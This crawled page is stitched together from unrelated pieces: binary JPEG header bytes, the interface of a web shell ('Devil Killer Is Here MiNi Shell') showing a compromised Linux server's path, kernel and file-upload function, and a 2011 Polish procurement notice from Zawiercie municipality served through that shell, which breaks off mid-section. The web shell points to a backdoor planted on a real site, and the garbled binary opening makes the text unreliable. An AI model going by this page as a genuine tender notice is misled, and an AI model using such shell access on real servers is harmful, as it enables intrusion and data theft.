JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111216/334707-N-2011.html

<p class="kh_header"><b>Zawiercie: Przeprowadzenie działań studyjno-koncepcyjnych dla terenów inwestycyjnych SAG-Obszar A w Zawierciu o łącznej pow.30,8608ha w zakresie opracowania:EtapI-Dokum.dotyczącej opracowania koncepcji zagospodarowania terenu, w tym ocena stanu infrastruktury technicznej, analiza kosztowa uzbrojenia,EtapII-Dokum.dot.opracowania kompleksowych badań geotechn.,w tym określenie warstw geologicznych, nośności gruntu, poziomu lustra wód gruntowych,Etap III-Dokum.dot.analizy kosztowej makroniwelacji,Etap IV-Dokum.techn. i projektowo-budowlanej związanej z uzbrojeniem terenu pod inwestycje</b><br>
<b>Numer ogłoszenia: 334707 - 2011; data zamieszczenia: 16.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Zawiercie , ul. Leśna 2, 42-400 Zawiercie, woj. śląskie, tel. 032 6722684, faks 032 6721513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.eu</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie działań studyjno-koncepcyjnych dla terenów inwestycyjnych SAG-Obszar A w Zawierciu o łącznej pow.30,8608ha w zakresie opracowania:EtapI-Dokum.dotyczącej opracowania koncepcji zagospodarowania terenu, w tym ocena stanu infrastruktury technicznej, analiza kosztowa uzbrojenia,EtapII-Dokum.dot.opracowania kompleksowych badań geotechn.,w tym określenie warstw geologicznych, nośności gruntu, poziomu lustra wód gruntowych,Etap III-Dokum.dot.analizy kosztowej makroniwelacji,Etap IV-Dokum.techn. i projektowo-budowlanej związanej z uzbrojeniem terenu pod inwestycje.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie działań studyjno-koncepcyjnych poprzez opracowanie w ramach Projektu pn Przygotowanie terenów inwestycyjnych w Strefie Aktywności Gospodarczej - Obszar A w Zawierciu dofinansowanego ze środków Programu Operacyjnego Innowacyjna Gospodarka 2007-2013:
Etap I - Dokumentacji dotyczącej opracowania koncepcji zagospodarowania terenu, w tym ocena stanu infrastruktury technicznej, analiza kosztowa uzbrojenia;
Etap II - Dokumentacji dotyczącej opracowania kompleksowych badań geotechnicznych, w tym określenie warstw geologicznych, nośności gruntu, poziomu lustra wód gruntowych;
Etap III - Dokumentacji dotyczącej analizy kosztowej makroniwelacji
Etap IV - Dokumentacji technicznej i projektowo-budowlanej związanej z uzbrojeniem terenu pod inwestycje.

Przedmiot Zamówienia ma być opracowany odrębnie dla: 
- obszaru inwestycyjnego o powierzchni 25,1213 ha obejmującego działki 613/2, 613/3, 613/4, 613/5 i 475/1
- obszaru inwestycyjnego o powierzchni 5,7395 ha obejmującego działki 210/33, 210/34, 210/36, 210/37, 210/39, 210/31.

Dokumentacja wchodząca w zakres Etapu IV przedmiotu umowy ma zostać wykonana zgodnie z :
- rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 .r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego     (Dz. U. z 2004 r. nr 202, poz. 2072 z późn. zm.). 
- rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz.U. z 2004 r. nr 130, poz. 1389)

Dokumentacja wchodząca w zakres Etapu II przedmiotu umowy ma zostać wykonana zgodnie z :
- Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 24 września 1998 r. w sprawie ustalania geotechnicznych warunków posadawiania obiektów budowlanych  (Dz.U. 1998 nr 126 poz. 839).

W ramach przedmiotu zamówienia mają zostać wykonane odrębnie dla każdego z terenów:
1. koncepcja zagospodarowania terenu, w tym:
- mapy do celów opiniodawczych i projektowych w przyjętym do opracowania zakresie wraz z odpowiednim terenem wokół - zgodnym z przepisami geodezyjnymi;
- opracowanie wywiadów dotyczących uzbrojenia i ich weryfikacja w terenie;
- opracowanie oceny stanu technicznego i przydatności istniejącej infrastruktury do planowanych założeń
- uzyskanie w niezbędnym zakresie i na swój koszt warunków technicznych, opinii, uzgodnień.
- wstępna koncepcja (w 2 wariantach do wyboru zamawiającego) - należy przedstawić Zamawiającemu min 2 wersje wariantowe założeń koncepcyjnych z podanymi uzyskanymi parametrami zabudowy (uzyskane powierzchnie zabudowy, powierzchnie dróg, ilość  miejsc postojowych, szacunkowe, wskaźnikowe zapotrzebowanie mediów) przy czym jedna z koncepcji ma uwzględniać uzbrojenie dla Budowy Zawierciańskiego Parku Przemysłowo-Technologicznego na terenie działki o nr ew. 613/2 w ramach projektu Budowa i wyposażenie Zawierciańskiego Parku Przemysłowo-Technologicznego w Zawierciu;
- koncepcja zagospodarowania terenu (rozwinięcie wybranego wariantu) z uwzględnieniem uzbrojenia terenu w media: woda, gaz/ciepło, sieci teletechniczne, energia elektryczna, kanalizacja sanitarna, kanalizacja deszczowa;
- projekt koncepcyjny parcelacji działek;
- projekt koncepcyjny zieleni;
- wizualizacje rozwiązań koncepcyjnych zagospodarowania terenu;
- opracowanie dotyczące planowanych kosztów inwestycji z uwzględnieniem infrastruktury technicznej,
- opracowanie harmonogramu procesu inwestycyjnego.
2. dokumentacja geotechniczna dla przewidzianych w zaakceptowanej koncepcji zagospodarowania terenu obiektów kubaturowych - 2 egz. w wersji papierowej; w tym
 - szczegółowe rozpoznanie budowy geologicznej i warunków hydrogeologicznych terenu objętego opracowaniem poprzez wykonanie badań geotechnicznych dla przewidzianych w koncepcji zagospodarowania terenu obiektów kubaturowych [w siatce 50x50 m - w miejscach skomplikowanych warunków odpowiednio zagęszczonych dla uzyskania miarodajnego wyniku] 
3. analiza kosztowa makroniwelacji
4. kompletna, wielobranżowa dokumentacja projektowo - kosztorysowa budowy uzbrojenia terenu w sieci wynikające z wybranej przez Zamawiającego koncepcji, w tym 
X przedmiary robót, przez który należy rozumieć opracowania zawierające zestawienie przewidywanych do wykonania robót w kolejności technologicznej ich wykonania, wraz z ich szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczeniem  i zestawieniem liczby jednostek miar robót podstawowych oraz wskazaniem podstaw do ustalania cen jednostkowych nakładów rzeczowych - 6 egz. w wersji papierowej; 
X kosztorys inwestorski   - 1 egz. w wersji papierowej; 
X szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych, przez które należy rozumieć opracowania zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót  - 6 egz. w wersji papierowej; 
X projekty budowlane i wykonawcze - 6 egz. w wersji papierowej;
X uzyskanie w niezbędnym zakresie i na swój koszt warunków technicznych, opinii, uzgodnień, decyzji niezbędnych do złożenia przez Zamawiającego skutecznego wniosku o pozwolenie na budowę - w tym również przeprowadzenie oceny oddziaływania na środowisko i opracowanie w razie konieczności raportu o oddziaływaniu przedsięwzięcia na środowisko w oparciu o stosowne akty prawne,

Wytyczne projektowe
Zamawiający wymaga aby dokumentacja uwzględniała następujące wytyczne:
1.	Na wyznaczonym terenie należy przewidzieć zabudowę wolno stojącą przemysłową, magazynowo - logistyczną i usługowo - handlową lub wynikającą z zaakceptowanego przez Zamawiającego wariantu koncepcyjnego;
2.	W jednej z wersji wariantowych założeń koncepcyjnych należy uwzględnić przygotowanie terenu działki o nr ew. 613/2 dla potrzeb Budowy Zawierciańskiego Parku Przemysłowo-Technologicznego w ramach projektu Budowa i wyposażenie Zawierciańskiego Parku Przemysłowo-Technologicznego w Zawierciu. 
3.	Zapewnić odpowiednią ilość stanowisk postojowych
4.	Zapewnić lokalizację terenów rezerw dla obiektów kubaturowych infrastruktury technicznej;
5.	W ramach zagospodarowania należy zaprojektować (koncepcyjnie) układ drogowy zapewniający właściwą obsługę terenu w tym obsługę pojazdów wielkotonażowych;
6.	W zakresie niniejszych opracowań wymagane jest zapoznanie się i dostosowanie do ustaleń obowiązującego dla terenu miejscowego planu zagospodarowania przestrzennego, który udostępniony jest na stronie internetowej www.zawiercie.eu zakładka Gospodarka, zakładka Plany zagospodarowania przestrzennego.

Wymogi z zakresu obsługi procedury opracowania projektu
1.	Wykonawca zobowiązuje się przeprowadzić co najmniej dwie konsultacje z Zamawiającym w sprawie omówienia szczegółowych rozwiązań koncepcyjnych wstępnych. Konsultacje odbędą się w siedzibie Zamawiającego w terminie ustalonym przez strony.
2.	Wykonawca zobowiązuje się do współpracy z wyznaczoną/wyznaczonymi przez Zamawiającego osobami oraz do stawienia się na spotkaniach na każde żądanie Zamawiającego. 
3.	Poza wymienionymi w pkt 1 Wykonawca zobowiązuje się do odbycia w ramach wynagrodzenia ofertowego trzech konsultacji z Zamawiającym w trakcie przygotowania przedmiotu zamówienia.

Każde z opracowań wchodzących w skład przedmiotu umowy należy dostarczyć w wersji tradycyjnej (papierowej) oraz na nośniku elektronicznym w formacie plików PDF. 
Wersja elektroniczna musi spełniać następujące wymagania: 
- Każdy tom przedmiotu umowy powinien być zapisany do pojedynczego pliku - nazwa pliku powinna odzwierciedlać temat opracowania. 
- Pliki muszą być wgrane do katalogu o nazwie określającej lokalizacje przedmiotu umowy. W tym samym katalogu musi być umieszczony plik w formacie tekstowym o nazwie SPIS.TXT, zawierający listę plików wraz z pełnymi tytułami opracowań w nich zawartych. 
- Przedmiary robót powinny być zapisane w podkatalogu o nazwie przedmiary. 

Ponadto do obowiązków Wykonawcy należy: 
- opisywanie proponowanych materiałów i urządzeń za pomocą parametrów technicznych, tzn. bez podawania ich nazw. Jeżeli nie będzie to możliwe i jedyną możliwością będzie podanie nazwy materiału lub urządzenia, wskazaniu temu muszą towarzyszyć wyrazy lub równoważny wraz z wskazaniem parametrów technicznych, które będą służyły do oceny równoważności. 
- konsultacja z Zamawiającym istotnych rozwiązań konstrukcyjnych, funkcjonalnych i materiałowych mających wpływ na koszty robót budowlanych, które będą wykonywane na podstawie opracowanego przedmiotu umowy, 
- pełnienie nadzoru autorskiego zgodnie z art. 20 ust. 1 pkt 4 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2006 nr 156, poz. 1118  z późn. zmianami).

Szczegółowy zakres przedmiotu zamówienia określa także wzór umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5, 71.32.00.00-7, 71.33.20.00-4, 71.35.00.00-6, 71.35.20.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości: 5.000,00 zł.
2.	Wadium musi obejmować cały okres związania ofertą, zgodnie z postanowieniami punktu IX SIWZ i może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju 
Przedsiębiorczości.
3.	Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto: 

URZĄD MIEJSKI w ZAWIERCIU
ING BANK ŚLĄSKI CBK/CZĘSTOCHOWA
KONTO: 80 1050 1142 1000 0008 0065 3354

z dopiskiem: Wadium w postępowaniu pn. Przeprowadzenie działań studyjno-koncepcyjnych dla terenów inwestycyjnych Strefy Aktywności Gospodarczej - Obszar A w Zawierciu o łącznej powierzchni 30,8608 ha w zakresie opracowania:
Etap I - Dokumentacji dotyczącej opracowania koncepcji zagospodarowania terenu, w tym ocena stanu infrastruktury technicznej, analiza kosztowa uzbrojenia,
Etap II - Dokumentacji dotyczącej opracowania kompleksowych badań geotechnicznych, w tym określenie warstw geologicznych, nośności gruntu, poziomu lustra wód gruntowych,
Etap III - Dokumentacji dotyczącej analizy kosztowej makroniwelacji,
Etap IV - Dokumentacji technicznej i projektowo-budowlanej związanej z uzbrojeniem terenu pod inwestycje w ramach Projektu pn. Przygotowanie terenów inwestycyjnych w Strefie Aktywności Gospodarczej - Obszar A w Zawierciu dofinansowanego ze środków Programu Operacyjnego Innowacyjna Gospodarka 2007-2013 w ramach działania 6.2 Rozwój sieci centrów obsługi inwestorów i eksporterów oraz powstawanie nowych terenów inwestycyjnych, poddziałanie 6.2.2 Wsparcie działań studyjno-koncepcyjnych w ramach przygotowania terenów inwestycyjnych dla projektów inwestycyjnych.

Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku zamawiającego.
4.	Jeżeli wykonawca wnosi wadium w:
1)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem  pieniężnym;
2)	gwarancjach bankowych;
3)	gwarancjach ubezpieczeniowych,
4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z  późn. zm.)
oryginały dokumentów należy zdeponować w kasie Urzędu Miejskiego, a do oferty należy dołączyć poświadczoną za zgodność kserokopię.
W/w formy wadium muszą się znaleźć w kasie zamawiającego w terminie wyznaczonym
do składania ofert.
5.	Wadium wniesione w formach, o których mowa w pkt VIII ust. 4 SIWZ musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez wykonawcę określone w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych.

W szczególności zgodnie z art. 46 ust. 4a Pzp Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w pkt VI SIWZ lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa Oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek szczegółowy:
Wykonawcy należycie wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
-  co najmniej 1 koncepcję lub projekt zagospodarowania terenów o powierzchni min. 5 ha,
- co najmniej 1 dokumentację projektową infrastruktury technicznej uzbrojenia terenów o powierzchni min. 5 ha,
- co najmniej 1 dokumentację geotechniczną dla obiektów kubaturowych.

Ocena spełniania przedstawionego powyżej warunku zostanie dokonana wg formuły: spełnia - nie spełnia.
Złożenie przez Wykonawcę w ofercie:
- Oświadczenia o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 1 do SIWZ,
- Wykazu wykonanych usług (sporządzonego według wzoru stanowiącego załącznik nr 2 do specyfikacji) w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców.
Do wykazu należy załączyć dokumenty potwierdzające, że w/w usługi zostały wykonane należycie (np. referencje)
- będzie stanowiło podstawę do oceny spełnienia warunku udziału w postępowaniu. Zamawiający sprawdzi z treści tych dokumentów i oświadczeń czy Wykonawca spełnia ww. warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa Oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek szczegółowy w zakresie dysponowanie (przez Wykonawców) osobami zdolnymi do wykonania zamówienia, w szczególności dysponowania osobami, które będą uczestniczyć w wykonywaniu zamówienia:
a)	 minimum 1 osobą posiadającą uprawnienia budowlane do projektowania:
- w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
b)	minimum 1 osobą posiadającą uprawnienia budowlane do projektowania:
- w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
c)	minimum 1 osobą posiadającą uprawnienia budowlane do projektowania:
- w specjalności telekomunikacyjnej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
d)	minimum 1 osobą będącą członkiem Izby Urbanistów (zgodnie z przepisami ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa lub urbanistów (Dz. U. z 2001 r. nr 5, poz. 42 z późn. zm.) 
e)	minimum 1 osobą posiadającą uprawnienia geologiczne kategorii VII do wykonywania, dozorowania i kierowania pracami geologicznymi wydane na podstawie obowiązujących przepisów

Ocena spełniania przedstawionego powyżej warunku zostanie dokonana wg formuły: spełnia - nie spełnia.
Złożenie przez Wykonawcę w ofercie:
- Oświadczenia o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 1 do SIWZ,
- Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia (sporządzony według wzoru stanowiącego załącznik nr 3 do specyfikacji), odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, zakresu wykonywanych przez nie czynności, wraz z informacją o podstawie do dysponowania tymi osobami. 
Do wykazu należy dołączyć oświadczenie, że osoby, które będą wykonywać zamówienie posiadają wymagane uprawnienia
- będzie stanowiło podstawę do oceny spełnienia warunku udziału w postępowaniu. Zamawiający sprawdzi z treści tych dokumentów i oświadczeń czy Wykonawca spełnia ww. warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek szczegółowy - Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 200 000,00 zł.
Ocena spełniania przedstawionego powyżej warunku zostanie dokonana wg formuły: spełnia - nie spełnia.
Złożenie przez Wykonawcę w ofercie:
- Oświadczenia o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 1 do SIWZ,
- opłaconej polisy, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 200.000 złotych (słownie zł: dwieście tysięcy)
- będzie stanowiło podstawę do oceny spełnienia warunku udziału w postępowaniu. Zamawiający sprawdzi z treści tych dokumentów i oświadczeń czy Wykonawca spełnia ww. warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

